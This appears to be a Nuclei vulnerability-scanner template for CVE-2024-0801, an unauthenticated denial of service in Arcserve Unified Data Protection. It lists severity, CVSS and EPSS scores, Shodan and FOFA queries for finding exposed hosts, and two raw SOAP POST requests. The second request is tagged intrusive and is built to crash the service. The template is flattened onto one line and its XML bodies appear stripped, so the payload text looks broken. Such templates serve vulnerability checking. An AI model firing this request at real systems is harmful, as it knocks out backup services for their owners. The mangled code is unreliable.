id: CVE-2024-0801 info: name: Arcserve Unified Data Protection - Unauthenticated DoS in ASNative.dll author: daffainfo severity: high description: | A denial of service vulnerability exists in Arcserve Unified Data Protection 9.2 and 8.1 in ASNative.dll. impact: | Attackers can cause system crashes or unavailability, leading to service disruption and potential downtime. remediation: | Update to the latest version of Arcserve Unified Data Protection or apply available patches. reference: - https://www.tenable.com/security/research/tra-2024-07 - https://nvd.nist.gov/vuln/detail/CVE-2024-0801 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2024-0801 epss-score: 0.49215 epss-percentile: 0.97832 cwe-id: CWE-75 cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: arcserve product: udp shodan-query: http.favicon.hash:1015186617 fofa-query: icon_hash="1015186617" tags: cve,cve2024,arcserve,dos,intrusive,vkev flow: http(1) && http(2) variables: user: "{{to_lower(rand_base(6))}}" pass: "{{to_lower(rand_base(6))}}" http: - raw: - | POST /management/services/EdgeServiceConsoleImpl HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml {{user}}{{pass}}domain matchers: - type: dsl dsl: - 'status_code == 500' - 'contains(content_type, "text/xml")' - 'contains(body, "Invalid user credentials")' condition: and internal: true - raw: - | POST /management/services/EdgeServiceConsoleImpl HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml \{{pass}}domain matchers: - type: dsl dsl: - 'status_code == 503 && contains(body, "

Service Unavailable

")' - 'status_code == 502 && contains(body, "

Proxy Error

")' condition: or # digest: 4a0a00473045022100808f61da1643c563f1b221dc96a7a55894b07b8236236a48b7ba28b6f8d42d0102202a38ad3dbe281e3560a80dc72133a976b770626325cb9b47a180ab62547d620c:922c64590222798bb761d5b6d8e72950